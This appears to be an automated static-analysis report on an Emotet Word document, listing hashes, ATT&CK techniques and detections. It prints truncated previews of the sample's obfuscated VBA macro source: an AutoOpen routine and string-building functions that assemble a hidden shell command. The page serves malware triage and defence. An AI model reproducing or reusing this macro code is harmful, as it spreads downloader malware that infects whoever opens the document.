Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 8b90d9d07b353223…

MALICIOUS

Office (OLE)

438.0 KB Created: 2018-09-25 13:07:00 Authoring application: Microsoft Office Word First seen: 2019-01-31
MD5: 5ed74cb45b866fb7e27416a67dc33340 SHA-1: fd5f31e0bc957b90512db1dff774332d7e46d5bb SHA-256: 8b90d9d07b353223397f3561555e710863853665ee411543cdd5b9febc56a2b3
402 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen subroutine, a common technique for Emotet. The macros utilize obfuscated code and a Shell() call, indicating an attempt to download and execute a secondary payload. ClamAV detections further confirm its malicious nature as a downloader.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-6872603-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6872603-0
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 448,512 bytes but its declared streams total only 200,104 bytes — 248,408 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 231046 bytes
SHA-256: 1a5cbcedd35dd54678c2a5fa30c547dadd15cf9ad47f5ed46597656f12b4f693
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jtTwjtRwjhdJFX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim Glifh(2)
Glifh(0) = MidB(qRzaB + FzBEhzRkCIiSpKmfXjZ + LbuZAiL, 286, 776) + MidB(JMjJU + McXChPnooWLEftGCrkq + qfdBSbdL, 608, 263)
Glifh(1) = Left(HItiu + XsdijuqqRAlWmBmiUN + fqSJN, 713) + MidB(zWwTAN + GblbtibqivrsPshzrNl + ptDPa, 360, 556)
   Dim pXtck(1)
pXtck(0) = Mid(Ocpjp + hiPHTQFVwjlAbMBwmDs + cQwdl, 913, 866) + MidB(OVlKLJ + GBvvwQYCpisjbKfCTczZ + SlGaFp, 833, 264) + Left(rCIdzXaY + XkmjFjHPWIfffSbHzr + izcCBDvB, 483) + MidB(siwZVFJk + pPMdwUzRGSsjdwiD + iIwmwj, 869, 126)
   Dim zaJtC(2)
zaJtC(0) = MidB(IjCId + KsOdmAwtvfwkknFVjfjW + GCHTisp, 371, 990) + MidB(TqkiFEH + GRXVciHANbWjwqaoCqd + HoiUqbb, 536, 165)
zaJtC(1) = Mid(ofmqwpi + cJXADjPTLXdhqNiQZmz + JsTEksMH, 206, 979) + Left(QdQKLzIw + GoYCsRszdwLNKtazPS + QXaRGNo, 821)
   Dim LvEzwI(1)
LvEzwI(0) = Left(ElJflZ + aawHjzEwTNjNJPDQEdD + jYsifB, 718) + MidB(qbkBYv + GbivuGvVfhJHNdaKGZTU + RXhfBbHD, 259, 449) + Right(amRwJY + HLcEFzlFRnHcjNqEDZF + vNDosKQu, 967) + MidB(FudZdiWw + UUbJijSSiBRmIJsvBtI + XpkRa, 494, 59)
krErjrCJirijBJ (KeyString(jdoiQ + iqCHM + 4 + 6 + 1 + 5 + 51 + tqqrG + dzGGPqB) + sPQLM + AMZbVd + KeyString(vUmDpCO + aCjib + 4 + 7 + 1 + 6 + 59 + BuiKswP + WpihCLA) + SzVQpkmXW + wFfzfEYzzPl + jwGGsdHEf + tInFCFq + lcvEusMMIRm + CtkoPMfZML + KIfKwTc + phCLcXrwIN + pVPSR + BhRiO + cljlDjLp + OWYLcLOkhfk + GCXVzCZh + DfPsnuJRu + mCRLLwfDqBR + ALiEi + DNSLiPX + bsbiK + ZfzooHUj)
   Dim ObpXSv(2)
ObpXSv(0) = Right(vOJNCQdm + SGZBfZElGiTljLTtjTr + NDisz, 738) + Left(bDicZM + wNKZRdWhWEJtbPVobChE + MrhEDG, 979)
ObpXSv(1) = MidB(iGhRmlaM + iaYDOHNYUAQIEjwSd + mDqiu, 947, 666) + MidB(qWbQv + SzpBaCpRWNiBdtjOVMfNQVUS + htIPudVo, 265, 585) + MidB(ZkXjAB + pNnGTcnkjFkfWQSGAYs + EGnupjVT, 901, 239) + Mid(FBvSql + YzjCUuiuXZwMpCsusKmpSR + CWnKnd, 357, 501)
   Dim iCuqL(1)
iCuqL(0) = Right(mtwBts + TjjztiiUTcTTjkRFYED + qHsQcv, 620) + Right(uUbnhP + iqXiizDMRbnCqPQllRrH + uZOFcDCO, 553) + MidB(rhIIpE + EzVDFKWdEiqikZpGGOYYZ + ZjAdw, 240, 956) + MidB(qZVIuFi + ziiHoiAznPfjDlmXzIS + CCODj, 241, 19)
End Sub


Attribute VB_Name = "kauCoYXnIH"
Function SzVQpkmXW()
BaFuRSwh = "d " + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "V^" + ":" + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "C" + CStr(Chr(2 + 0 + 5 + 4 + 23)) + "^" + "s^" + "e^" + "t" + " ^" + CStr(Chr(8 + 1 + 15 + 13 + 55))
mRpzs = "^" + ".]" + ",=" + "^" + "5" + "1^" + "3" + " "
jWVdapsTz = "9" + "^" + "5" + "0 " + "5" + "1" + "^" + "9" + " " + "^" + "9^" + "1" + "3"
JmSmVROhljB = "^" + " " + "59" + "0^" + " " + "09" + "3 " + "^"
iYunfiR = "9" + "50" + "^" + " " + "^"
SzVQpkmXW = BaFuRSwh + mRpzs + jWVdapsTz + JmSmVROhljB + iYunfiR
   Dim zDShz(1)
zDShz(0) = Right(XIIVSLqm + asjPjcbqjwwJrUUXH + GSTHPJ, 392) + Left(ZHHpDw + CpGIXzcLMaqWOOmOvbl + UOZVY, 144) + MidB(LDURnEiS + EwufwKscRjNoRVwaYEDG + StzUHDv, 414, 947) + Left(NoSPca + JwPDvpQZBaAqNAdQUOorrkz + rKvdZ, 356)
   Dim YTcjW(2)
YTcjW(0) = MidB(JTRqriz + WVlEIQuLTsiKdXZziKzkb + uLWIirzR, 475, 884) + Left(fpnOE + wwqtuMFLnYkJkRVJoAhtEdc + KvwtizVs, 85) + MidB(wZtlizJ + NTEZuRRFmQSpLrfGLPY + NNPHvO, 88, 394) + Mid(jqrWwNUD + AIGNGVTCwIoCmLVWqhv + fwZUhsrL, 722, 978)
YTcjW(1) = Mid(HBAab + UrroEKLwhwkEiKvSmK + DDVGZAVv, 287, 942) + Mid(wnIVJQh + oOLwqTqIwHNuokrLdlh + cRuBaIW, 552, 278) + Left(pKJjji + wXSEzmFYWPslTZZoEz + wcZvYuI, 592) + Right(boDKNv + DzGzZHOYKHqMGWsTbNKQrQ + mhJLdKP, 932)
   Dim DqBfrd(2)
DqBfrd(0) = MidB(Xjjzno + wJZVGYTDPihGwbXZatzdl + UDSmMC, 234, 274) + MidB(tBafWE + uVNaFIJOYnzjoDPdRDjV + MiotuD, 784, 403) + Right(PKtwKcsn + hiERrbHLYOAVLtaUVwif + YKQToK, 869) + Mid(hdaWBT + JccPohjHSSSDGwTQ + XOUSE, 572, 296)
DqBfrd(1) = MidB(ZBZkVCWF + LmjraPpaTahCEGHwkEqd + RtriAkqk, 777, 610) + Right(WuDPzojY + UijnOJzYJXwIVwjjzNZl + MsVEBtlC, 355)
End Function
Function wFfzfEYzzPl()
DiaZCswVSSJ = "1" + "0" + "^" + "3" + "^ "
... (truncated)
macros_1.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 231022 bytes
SHA-256: 8ee36c31aef55dd9896d94d718918cb6f54e6ca3b540a6a2732b0ad0df5033c1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jtTwjtRwjhdJFX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim Glifh(2)
Glifh(0) = MidB(qRzaB + FzBEhzRkCIiSpKmfXjZ + LbuZAiL, 286, 776) + MidB(JMjJU + McXChPnooWLEftGCrkq + qfdBSbdL, 608, 263)
Glifh(1) = Left(HItiu + XsdijuqqRAlWmBmiUN + fqSJN, 713) + MidB(zWwTAN + GblbtibqivrsPshzrNl + ptDPa, 360, 556)
   Dim pXtck(1)
pXtck(0) = Mid(Ocpjp + hiPHTQFVwjlAbMBwmDs + cQwdl, 913, 866) + MidB(OVlKLJ + GBvvwQYCpisjbKfCTczZ + SlGaFp, 833, 264) + Left(rCIdzXaY + XkmjFjHPWIfffSbHzr + izcCBDvB, 483) + MidB(siwZVFJk + pPMdwUzRGSsjdwiD + iIwmwj, 869, 126)
   Dim zaJtC(2)
zaJtC(0) = MidB(IjCId + KsOdmAwtvfwkknFVjfjW + GCHTisp, 371, 990) + MidB(TqkiFEH + GRXVciHANbWjwqaoCqd + HoiUqbb, 536, 165)
zaJtC(1) = Mid(ofmqwpi + cJXADjPTLXdhqNiQZmz + JsTEksMH, 206, 979) + Left(QdQKLzIw + GoYCsRszdwLNKtazPS + QXaRGNo, 821)
   Dim LvEzwI(1)
LvEzwI(0) = Left(ElJflZ + aawHjzEwTNjNJPDQEdD + jYsifB, 718) + MidB(qbkBYv + GbivuGvVfhJHNdaKGZTU + RXhfBbHD, 259, 449) + Right(amRwJY + HLcEFzlFRnHcjNqEDZF + vNDosKQu, 967) + MidB(FudZdiWw + UUbJijSSiBRmIJsvBtI + XpkRa, 494, 59)
krErjrCJirijBJ (KeyString(jdoiQ + iqCHM + 4 + 6 + 1 + 5 + 51 + tqqrG + dzGGPqB) + sPQLM + AMZbVd + KeyString(vUmDpCO + aCjib + 4 + 7 + 1 + 6 + 59 + BuiKswP + WpihCLA) + SzVQpkmXW + wFfzfEYzzPl + jwGGsdHEf + tInFCFq + lcvEusMMIRm + CtkoPMfZML + KIfKwTc + phCLcXrwIN + pVPSR + BhRiO + cljlDjLp + OWYLcLOkhfk + GCXVzCZh + DfPsnuJRu + mCRLLwfDqBR + ALiEi + DNSLiPX + bsbiK + ZfzooHUj)
   Dim ObpXSv(2)
ObpXSv(0) = Right(vOJNCQdm + SGZBfZElGiTljLTtjTr + NDisz, 738) + Left(bDicZM + wNKZRdWhWEJtbPVobChE + MrhEDG, 979)
ObpXSv(1) = MidB(iGhRmlaM + iaYDOHNYUAQIEjwSd + mDqiu, 947, 666) + MidB(qWbQv + SzpBaCpRWNiBdtjOVMfNQVUS + htIPudVo, 265, 585) + MidB(ZkXjAB + pNnGTcnkjFkfWQSGAYs + EGnupjVT, 901, 239) + Mid(FBvSql + YzjCUuiuXZwMpCsusKmpSR + CWnKnd, 357, 501)
   Dim iCuqL(1)
iCuqL(0) = Right(mtwBts + TjjztiiUTcTTjkRFYED + qHsQcv, 620) + Right(uUbnhP + iqXiizDMRbnCqPQllRrH + uZOFcDCO, 553) + MidB(rhIIpE + EzVDFKWdEiqikZpGGOYYZ + ZjAdw, 240, 956) + MidB(qZVIuFi + ziiHoiAznPfjDlmXzIS + CCODj, 241, 19)
End Sub


Attribute VB_Name = "kauCoYXnIH"
Function SzVQpkmXW()
BaFuRSwh = "d " + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "V^" + ":" + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "C" + CStr(Chr(2 + 0 + 5 + 4 + 23)) + "^" + "s^" + "e^" + "t" + " ^" + CStr(Chr(8 + 1 + 15 + 13 + 55))
mRpzs = "^" + ".]" + ",=" + "^" + "5" + "1^" + "3" + " "
jWVdapsTz = "9" + "^" + "5" + "0 " + "5" + "1" + "^" + "9" + " " + "^" + "9^" + "1" + "3"
JmSmVROhljB = "^" + " " + "59" + "0^" + " " + "09" + "3 " + "^"
iYunfiR = "9" + "50" + "^" + " " + "^"
SzVQpkmXW = BaFuRSwh + mRpzs + jWVdapsTz + JmSmVROhljB + iYunfiR
   Dim zDShz(1)
zDShz(0) = Right(XIIVSLqm + asjPjcbqjwwJrUUXH + GSTHPJ, 392) + Left(ZHHpDw + CpGIXzcLMaqWOOmOvbl + UOZVY, 144) + MidB(LDURnEiS + EwufwKscRjNoRVwaYEDG + StzUHDv, 414, 947) + Left(NoSPca + JwPDvpQZBaAqNAdQUOorrkz + rKvdZ, 356)
   Dim YTcjW(2)
YTcjW(0) = MidB(JTRqriz + WVlEIQuLTsiKdXZziKzkb + uLWIirzR, 475, 884) + Left(fpnOE + wwqtuMFLnYkJkRVJoAhtEdc + KvwtizVs, 85) + MidB(wZtlizJ + NTEZuRRFmQSpLrfGLPY + NNPHvO, 88, 394) + Mid(jqrWwNUD + AIGNGVTCwIoCmLVWqhv + fwZUhsrL, 722, 978)
YTcjW(1) = Mid(HBAab + UrroEKLwhwkEiKvSmK + DDVGZAVv, 287, 942) + Mid(wnIVJQh + oOLwqTqIwHNuokrLdlh + cRuBaIW, 552, 278) + Left(pKJjji + wXSEzmFYWPslTZZoEz + wcZvYuI, 592) + Right(boDKNv + DzGzZHOYKHqMGWsTbNKQrQ + mhJLdKP, 932)
   Dim DqBfrd(2)
DqBfrd(0) = MidB(Xjjzno + wJZVGYTDPihGwbXZatzdl + UDSmMC, 234, 274) + MidB(tBafWE + uVNaFIJOYnzjoDPdRDjV + MiotuD, 784, 403) + Right(PKtwKcsn + hiERrbHLYOAVLtaUVwif + YKQToK, 869) + Mid(hdaWBT + JccPohjHSSSDGwTQ + XOUSE, 572, 296)
DqBfrd(1) = MidB(ZBZkVCWF + LmjraPpaTahCEGHwkEqd + RtriAkqk, 777, 610) + Right(WuDPzojY + UijnOJzYJXwIVwjjzNZl + MsVEBtlC, 355)
End Function
Function wFfzfEYzzPl()
DiaZCswVSSJ = "1" + "0" + "^" + "3" + "^ "
... (truncated)
embedded_office_off00036ac2.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x36AC2 224574 bytes
SHA-256: 19b9837609a7ef5548b80351507131b8289b559c10b73d4a564a50c31c39edc7
Detection
ClamAV: Doc.Downloader.Emotet-6872603-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.